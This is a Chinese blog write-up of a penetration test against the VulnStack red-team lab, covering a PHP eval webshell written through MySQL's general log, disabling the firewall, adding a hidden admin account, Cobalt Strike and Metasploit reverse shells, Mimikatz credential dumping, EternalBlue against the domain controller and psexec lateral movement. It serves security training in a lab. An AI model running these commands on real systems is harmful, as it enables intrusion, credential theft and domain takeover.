红日-VulnStack靶场-ATT&CK(一)横向渗透两种方法

已于 2023-09-27 09:26:06 修改
阅读量1.3k 收藏 6
点赞数 3
分类专栏: 红日-VulnStack靶场-ATT&CK实战 文章标签: 网络 web安全 安全
于 2023-09-26 21:37:55 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/braty_/article/details/133283870
版权
本文详细描述了红日安全团队提供的内网渗透实战过程,包括环境准备、信息收集(端口扫描、目录扫描)、web渗透(mysql日志木马、webshell)、内网渗透(CS部分、内网横向渗透、永恒之蓝攻击)和CS_psexec横向移动技术的应用。
摘要由CSDN通过智能技术生成

红日实战一:

前言:

VulnStack 是由红日安全团队倾力打造一个靶场知识平台,靶场环境(CMS、漏洞管理、以及域管理等)全部依据国内企业的业务习惯进行模拟,环境设计思路全部来源 ATT&CK 红队评估设计模式,从环境搭建、漏洞利用、内网搜集、横向移动、构建通道、持久控制、痕迹清理等方式进行搭建靶场和设计题目。为了进一步学习内网渗透,本文将学习并记录红日安全团队提供的一个内网域环境靶场的渗透过程。

 

目录

红日实战一:

前言:

环境准备:

一.信息收集:

1.端口扫描:

2.目录扫描:

二.web渗透:

1.mysql日志导入木马。

2.Antsword连接

3.yxcms前台模板写马

4.Antsword连接

三.内网渗透

1.CS部分

1.1创建用户,关闭防火墙

1.2.cs上线

1.3.提权+收集内网信息

1.4域内网信息收集

2.内网横向渗透:

2.1.CS联动msf

2.2.判断是不是蜜罐。

2.3.静态路由配置

2.4.利用msf模块进行局域网端口扫描。

2.5.扫描永恒之蓝

2.6.永恒之蓝攻击域控获取shell:

做法二:CS_psexec横向移动

环境准备:

环境搭建:kali攻击机,win7靶机(服务器),win2008域控,win2003域成员。

网络拓扑图:9ac3dbc63fed4f0081d50dc2ff0a2223.png

网卡配置:vmware

5598d4ce1efb420c825ce475b6c7180b.png

win7:既能通外网也能同内网,所以需要两张网卡

32b0ced5739a41b285ed1db32b7bc18c.png

win2008:

78573e4a743c4cfa83bda4486ed40285.png

win2003:

 

一.信息收集:

1.端口扫描:

利用kali nmap扫描:发现80和3306端口。

nmap -sV 192.168.31.161

f2041bf9b8d3423eaadb0d88d9de82aa.png

访问 http://192.168.31.161, 发现是php探针,由此判断,该服务是由phpstdy搭建。

7c9d187bf61c4151a5489ac1efb5060e.png

2.目录扫描:

使用dimap工具扫描:发现beifen.rar文件和phpmyadmin管理页面,打开beifen.rar发现是yxcms的源代码。

---->发现http://192.168.31.61/yxcms

./dirmap -i http://192.168.31.161 -lcf

91d38a591f53480eb429745c68135efd.png

a7fc53eef7b749b88fb77f2269d2cf76.png

使用phpmyadmin爆破攻击,发现弱口令 root/root。

4dc95a83e83449bfa7c6f26eee881c91.png

登录后台:

a5925fa9c1b24f679048b3f85b797f22.png

二.web渗透:

到这一步我们要想办法上传木马并且知道上传木马的绝对路径。

1.mysql日志导入木马。

查看日志状态: show variables like '%general%'; 
开启general_log为True: SET GLOBAL general_log='on'; 
执行命令指定日志写马: SET GLOBAL general_log_file='C:/phpStudy/www/1.php'; 
写入一句话到马中: SELECT '<?php eval($_POST["cmd"]);?>';

5a9d74eaf7c24175b070d039017b0af3.png

0f43146d10124917a4502e5131084a38.png

4fb7d7212c544cd797f822be4e10cc5e.png

2.Antsword连接

一句话木马demo.php上传成功,我们尝试用antsword连接,连接成功。

0ccc3a42c83c4413ab24f90ba4e843ca.png

到这,phpmyadmin页面已经是攻击完成了,接下来访问http://192.168.31.61/yxcms页面进行web渗透。

我们用物理机去访问,公告可以看到后台地址是http://192.168.31.161/yxcms/index.php?r=admin,访问并登录。

e2d5124076b84c23864089701fe41fce.png

cac3b0b656794a588a0f2538c3a5bd9b.png

3.yxcms前台模板写马

在前台模板功能发现可以在php文件里面写入一句话木马,想办法找到木马路径。

aaebf8ffacd845e09941f65a6064c253.png

在备份文件中找到路径:

0c732e7fa1114898acc3e89fa13a7c40.png

4.Antsword连接

Antsword进行连接,连接成功!

4ac61c82c91f4823b163a4913e1baa56.png

到此web渗透结束。

三.内网渗透

目标是通过 Win7 外网服务器主机的现有控制权,横向渗透内网,拿下域控!在此之前需要进行内网信息搜集,摸清内网域组成和网络拓朴。

1.CS部分

1.1创建用户,关闭防火墙

netsh advfirewall set allprofiles state off         #win关闭防火墙
net user yzy 1qaz@WSX /add                          #添加账户密码
net localgroup administrators yzy /add              #添加为管理员权限
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f       # 开启3389端口
 

使用ipconfig,发现内网网段。

3e8bfac61f744a669b1db1567c96d08f.png

1.2.cs上线

kali开启CS服务端,物理机连接。

这里就简称上线三部曲:开启监听——制作木马——wenbshell工具上传执行,,即可完成上线。

fd667bb32671496ebf8d30a4c01e7790.png

d26f8ba79da54500a5303c17163ff100.png

46cbdbd305c74c1fba66d2a7190c682a.png

459bdd486eae4a9d8f09a1c6f653f3a2.png

1222cc5a564a4a64a316a02c549656b6.png

将文件设置为隐藏

b216f1dd4a24437d91549fb36a925f23.png

732426fed0274c8ea2200dfd8ea6d92a.png

1.3.提权+收集内网信息

sleep 5             加快相应速度,数字越低越好
shell systeminfo    查看系统版本补丁程序等信息。

0794933230c941079b347e2a0ac9785d.png

发现域名和补丁程序

4b00135ff3a34b2285ee64f6bee9c966.png

cb49e7077c184f2eb44810f437673937.png

system上线,提权成功。

9a0c3d2b5ddd4d27b765de315d86fabe.png

可使用 Mimikatz 直接抓取本机用户密码:

2d93169c97d84c2bb1310e5956e53519.png

888aa197a08647a4a6e839050a490290.png

1.4域内网信息收集

内网信息收集的主要目的就是查找域控以及域内的其他主机,先附上部分内网信息收集的命令:

net view                          #查看局域网内其他主机名
net config Workstation            #查看计算机名、全名、用户名、系统版本、工作站、域、登录域
net user                          #查看本机用户列表
net user /domain                  #查看域用户
net localgroup administrators     #查看本地管理员组(通常会有域用户)
net view /domain                  #查看有几个域
net user 用户名 /domain            #获取指定域用户的信息
net group /domain                 #查看域里面的工作组,查看把用户分了多少组(只能在域控上操作)
net group 组名 /domain                #查看域中某工作组
net group "domain admins" /domain     #查看域管理员的名字
net group "domain computers" /domain  #查看域中的其他主机名
net group "doamin controllers" /domain  # 查看域控制器主机名(可能有多台)

a.先查看有这台靶机处于几个域,发现只只处于一个域。

shell net view /domain                #查看域环境

72c1f87e88114561bef8c7fff3a7c629.png

b.查看域控主机,为owa

net group "domain controllers" /domain      #查看域控制主机

ab5224aed38b492da2f61bde5f9b9ca9.png

c.显示域内其他主机

net view                             #显示域内其他主机和ip,最好在攻击视图里显示

6219fc34be8544b993401e6c30c939a4.png

整理内网信息:

域名:god.org
域内三台主机:OWA、ROOT-TVI862UBEH、STU1(win7)
域控:OWA(192.168.52.138)
域成员:ROOT-TVI862UBEH(192.168.52.141)
win7内网ip:192.168.52.143

2.内网横向渗透:

接下来将通过 Win7 跳板机,横向渗透拿下内网域内的域成员主机和域控主机。

2.1.CS联动msf

a,kali先打开监听,设置payload,配置ip和端口。

use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.31.216
set lport 6666
exploit

b6b1622012354d53accf525ea35b2443.png

b,cs开启新监听

5bbb719e9b6b4831b972378f530ed860.png

4e69c217bbec4c3f893136b04ad44ef8.png

反弹shell到kali。

1a2e84fe8c574cfca3c1e6e75cffd6a4.png

1f0f6d820159466bafd1bc5ac0ea8463.png

2.2.判断是不是蜜罐。

run post/windows/gather/checkvm                   #判断是不是虚拟机(蜜罐)

21797541a4314791b539a31222adad87.png

2.3.静态路由配置

run post/multi/manage/autoroute        #加载MSF的autoroute模块,获取当前机器的所有网段信息

run post/multi/manage/autoroute SUBNET=192.168.52.0 ACTION=ADD       #添加目标内网路由

e8ce26175aa54269844d9aa3491a691b.png

2.4.利用msf模块进行局域网端口扫描。

先background 命令将当前执行的 Meterpreter 会话切换到后台,然后使用 MSF 自带 auxiliary/scanner/portscan/tcp 模块扫描内网域成员主机 192.168.52.141,发现445端口。(永恒之蓝尝试)

background                                      
use auxiliary/scanner/portscan/tcp 
set rhosts 192.168.52.141
set ports 80,135-139,445,3306,3389
run

7938fc66e04a44eeafbfa2ad7ec3bdba.png

扫描域控主机,发现也存在445端口,准备扫描永恒之蓝

31270502af2147458613ed3b14b40587.png

2.5.扫描永恒之蓝

search ms17_010                              #搜索MSF集成的与ms17_010漏洞相关的模块
use auxiliary/scanner/smb/smb_ms17_010       # 加载扫描exp
set rhosts 192.168.52.141                    #设置被扫描的主机IP
run                                          #进行扫描,观察是否存在该漏洞

发现都有永恒之蓝漏洞:

88bdf5129bc04715b3510e01c5c2cf2a.png

2.6.永恒之蓝攻击域控获取shell:

!!这里极有可能会打蓝屏,很幸运,没蓝屏并且攻击成功了,但是没有获取shell。。。

这里我个人考虑是有个后台的session1在,导致获取不了shell。

use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp
set rhosts 192.168.52.138
run

0ea181e91470485783602baa5c11c6b8.png

下图是攻击成功的示例图:

acfef4557519495e8d3388493f350bca.png

做法二:CS_psexec横向移动

原理:SMB Beacon:

SMB Beacon使用命名管道通过父级Beacon进行通讯,当两个Beacons链接后,子Beacon从父Beacon获取到任务并发送。因为链接的Beacons使用Windows命名管道进行通信,此流量封装在SMB协议中,所以SMB beacon相对隐蔽。SMB beacon不能直接生成可用载荷, 只能使用 psexec 或 Stageless Payload 上线

使用 smb beacon,由一台已经拿到 beacon 的机器,抓取密码后进行smb喷射,得到另一台开放445端口的机器上的administrator账户密码,在目标机器不出网的情况下,可以使用smb beacon使目标主机上线。

使用条件:

具有 Beacon 的主机必须接受 445 端口上的连接。 只能链接由同一个 Cobalt Strike 实例管理的 Beacon。 必须有目标主机的管理员权限或者说是拥有具有管理员权限的凭据。

这里直接继续设定监听器,使用抓取的密码进行尝试,使用域账号登录其余主机,先创建隧道:

3a3de1df43b34e858f93ae7fb9268093.png

8d6e2a0cb3c04d96b340f7d362dbff57.png

6d18a5d826ac44238e47ec552684d92f.png

4a37a52c4ce04ee2898582421c2e3de8.png

同样的方法对域成员使用:域成员同样上线,且也是system用户。

0535bc6122544a80a21d2fca1be23a63.png

5a87af67ae0841faade7a2e5eb6f11b8.png

ce52c2afeffe4887a8a4b384b5bbbcb4.png

 

 

kitha.
关注
专栏目录
渗透系列:ATT&CK红队评估(红日靶场二)
weixin_54626591的博客
01-22 247
ATT&CK红队评估(红日靶场二)
[红日靶场]ATT&CK实战系列——红队实战(—)
Huamang的博客
10-17 916
环境搭建 靶场地址 该靶场给了三台虚拟机 下载好分别开启,密码都是hongrisec@2019,登录后需要修改密码,我这里修改的hongri@2019 靶场环境是这样的 web服务器由win7来搞,网络可以按照官方给的配置 但由于我习惯了用自己的windows打,所以我把win7设置成nat,另一个网络设成vm1 另外两个虚拟机的网络适配器都设置成vm1 NAT的子网是192.168.159.0/24 在win7里面的phpstudy打开服务 成功访问 以上就已经搭建好了环境了 WEB服务渗透 n
vulnstack1--红队靶机(域渗透
tlovejr的博客
04-27 4118
一、前言 这几天一直有点任务,就一直没来得更新,现在继续给大家更新一些贴近真实情况的靶场环境,今天的文章或许会有点长,因为有好多和我一样的小白,所以在这就多墨迹几句,有什么不对的还请大佬们给予批评指正 二、靶场前准备 首先做靶场前先需要做一些准备 1、下载靶场镜像文件 这步就没什么过多介绍的 链接:https://pan.baidu.com/s/1lElVlUfEovffRWWOCktdVQ?pwd=6666 提取码:6666 2、修改各个靶机登录密码 因为第一次登录不修改密码的话,第二次开机时,原
红日靶场(通关笔记)
awonderfulrty的博客
08-30 625
SELECT '
红日靶场-ATT&CK实战系列-红队评估(一)
m0_66638011的博客
06-21 1101
红日靶机是一系列专门为渗透测试和网络安全实验室设计的虚拟机器。这些靶机提供了一系列不同的漏洞和攻击场景,使渗透测试者可以在这些环境下测试自的技能和工具。红日靶机主要以内网渗透学习为主。红日靶场网络结构复杂多样,包括外网、内网、DMZ区域等。不同的网络区域之间通过防火墙、路由器等设备进行隔离和访问控制。靶场网络结构中还包括了各种服务器和网络设备,如Web服务器、数据库服务器、文件服务器等。
红日内网Vulnstack靶机渗透
m0_63138919的博客
04-19 1262
本文利用红日VulnStack靶场 参考官方手册和部分博主的渗透测试思路,进行一次靶场渗透测试 主要记录自我学习的过程 还请各位大神勿喷
Vulnstack红日靶机渗透
m0_74631795的博客
09-05 890
一共4台虚拟机,1台为自己准备的kali攻击机,剩下3台为下载的靶机(win7为web服务器,winserver08为域控,win2K3为域内主机)kali和win7采用NAT模式(模拟外网),winserver08、win2K3和win7采用仅主机模式(选择VMnet2,其中win7为双网卡)扫描结果(143为win7web服务器,138为winserver08域控,141为win2K3域内主机,都开放了445端口)在win7web服务器中开启phpStudy环境,位置在C盘(若开启失败,重启虚拟机)
ATT&CK实战系列-红队评估 (红日靶场1)Vulnstack三层网络渗透靶场
qq_47289634的博客
07-07 444
换个思路,这个时候就可以利用(general_log、general_log file)日志文件getshell,general_log就是记录输入的日志文件,general_log file就是规定日志保存在哪个路径,我们只要输入一句话然后保存网站目录下的php文件就OK了。开启它,设置general_log为on,并且把日志存放路径设置为网站根目录,这样就可以写入shell了。保证kali和本机可以访问win7,给win7配置两块网卡,让win7既可以访问外网,也可以访问内网。
ATT&CK实战系列-红队实战(一)vulnstack 红日靶场
weixin_68652890的博客
05-20 1747
文章目录信息搜集主机发现端口扫描目录扫描getshell用sql向日志文件写后门getshell网站后台getshell内网信息搜集域信息搜集探测内网存活主机和端口提升权限msf会话移交cscs提权横向移动密码收集psexec横向 信息搜集 主机发现 nmap 192.168.5.0/24 端口扫描 nmap 192.168.5.174 开放3306、80端口 目录扫描 python3 dirmap.py -i http:// 192.168.5.174 -lcf 其它方法 dirsearch -u h
ATT&CK红队评估(红日靶场五)
weixin_45682839的博客
04-30 1699
ATT&CK红队评估(红日靶场五)通关攻略,涉及知识包括:ThinkPHP5.0 RCE漏洞、内网渗透横向移动、psexec使用、代理建立,matespolit、cobaltstrike等工具使用。
ATT&CK红队评估(红日靶场二)
weixin_45682839的博客
04-11 2855
靶场搭建 靶场下载地址:漏洞详情 一共有三台主机:WEB、DC、PC WEB主机有两张网卡,第一张网卡NAT,第二张网卡选择一个仅主机模式的网络(vmvare可以通过编辑里的虚拟网络编辑器进行添加或修改网络)这里我选择的是创建的仅主机vmnet15网络 DC主机只有一张网卡,选择和WEB第二章网卡一样的vmnet15网络 PC有两张网卡,配置和WEB主机一样,第一张网卡NAT,第二张网卡vmnet15 网络设置完成后进行开机 WEB主机以administrator第一次登录时没
VulnStack域环境靶场渗透(一)
qq_43590351的博客
09-20 1453
红日靶场一 msfvenom -p windows/meterpreter_reverse_tcp LHOST=192.168.31.229 LPORT=4444 -f exe -o msf1.exe 实验环境 web服务器 192.168.31.79192.168.52.143 域成员server2003 192.168.52.141 域控server2008 192.168.52.138 物理机 192.168.31.238 kali-vps 192.168.31.229
内网渗透vulnstack靶场系列(一)
xf555er的博客
10-18 2115
Vulnstack靶场有两个默认用户, 分别是域成员和域管理员用户, 其默认密码均为首次登录会要求用户修改密码, 除此之外我还新添加了个用户用于登录win2003主机所有的用户信息如下表格所示:下图为网卡的配置信息, 配置的子网IP为, 设置为仅主机模式下图为NAT模式的网卡配置信息, 配置的子网IP为域控的网络连接配置如下:Web服务器有两个网卡, 其中一个网卡是用于Web服务器与域内主机进行数据交互, 此网卡需将DNS服务器地址设置成域控服务器地址, 其他域内成员的网络配置亦是如此, 这里就不详细描述了
红日靶场vulnstack1-完整渗透过程
信安是不可或缺的一部分!
09-26 1646
大家有兴趣可以尝试获取,也可以通过网上披露的已知漏洞进行攻击,也可以做深入的代码审计方法很多,包括使用永痕之蓝漏洞,msf可以直接提到system权限,这里不在继续。没有识别到杀软,可以做msf上线或者做内网穿透或者冰蝎隧道(不推荐),看个人选择,也可以上线cs,做横向移动或者权限维持,这里我选择做简单的权限维持。因为版本很多已知漏洞无法使用有一些POC:https://www.exploit-db.com/exploits/25003。上传图片成功但是需要审核:这里就不能上传了,找一下后台登录点。
复现红日安全-ATT& CK实战:Vulnstack靶场实战(一)
weixin_51152373的博客
06-14 1091
内网实战环境配置所有主机密码为:hongrisec@2019密码同一修改为:hongrisec@2021攻击机名称: win 10 | kali 2020vm1名称: win 7ip: 外网:192.168.154.0内网:192.168.52.143vm2名称: win 2003vm3名称: win 2008(域控)网络配置Win7服务开启。
玩转红日-VulnStack靶场-ATT&CK(八)
A_991128a的博客
08-28 1263
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。干货主要有:①1000+CTF历届题库(主流和经典的应该都有了)②CTF技术文档(最全中文版)③项目源码(四五十个有趣且经典的练手项目及源码)
VulnStackATT&CK-1
学习学习学习......
02-15 1144
主机发现、端口扫描,服务探测,操作系统探测、nmap 漏洞库扫描、网站首页信息泄露、msf 渗透与信息收集、mimikatz 抓取密码、rdesktop 连接远程桌面、探测内网存活主机、msf 添加内网路由、EarthWorm 内网穿透、proxychains4 代理、msf 利用 MS17-010(永恒之蓝)漏洞、共享 C 盘利用。
红日安全ATTCK靶机实战二
m0_64053653的博客
07-13 933
网1:nat不改,去改他们的静态ip网2:新建内网ip段。
Vulnstack红日安全内网域渗透靶场1实战_vulnstack靶场
最新发布
2401_86951299的博客
09-12 827
1、先判断是否存在域,使用查看 DNS 服务器,发现主 DNS 后缀不为空,存在域god.org,如下图所示:或者也可以执行命令来查看当前计算机名、全名、用户名、系统版本、工作站、域、登录域等全面的信息:2、上面发现 DNS 服务器名为 god.org,当前登录域为 GOD,那接下来可执行查看有几个域(域环境可能存在多个域):3、既然只有一个域,那就利用命令查看域控制器主机名,直接确认域控主机的名称为 OWA:4、已经确认域控主机的名称为 OWA,继续执行命名net view。
构建与运营企业内部ATT&CK框架
ATT&CK是由MITRE创建的一种基于已知攻击技术的知识库,旨在帮助组织理解和防御高级持续性威胁(APT)的攻击手法。文档提到了ATT&CK的最新版本V9和2021路线图,包括对不同平台如MacOS、IaaS、SaaS、容器领域的攻击...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值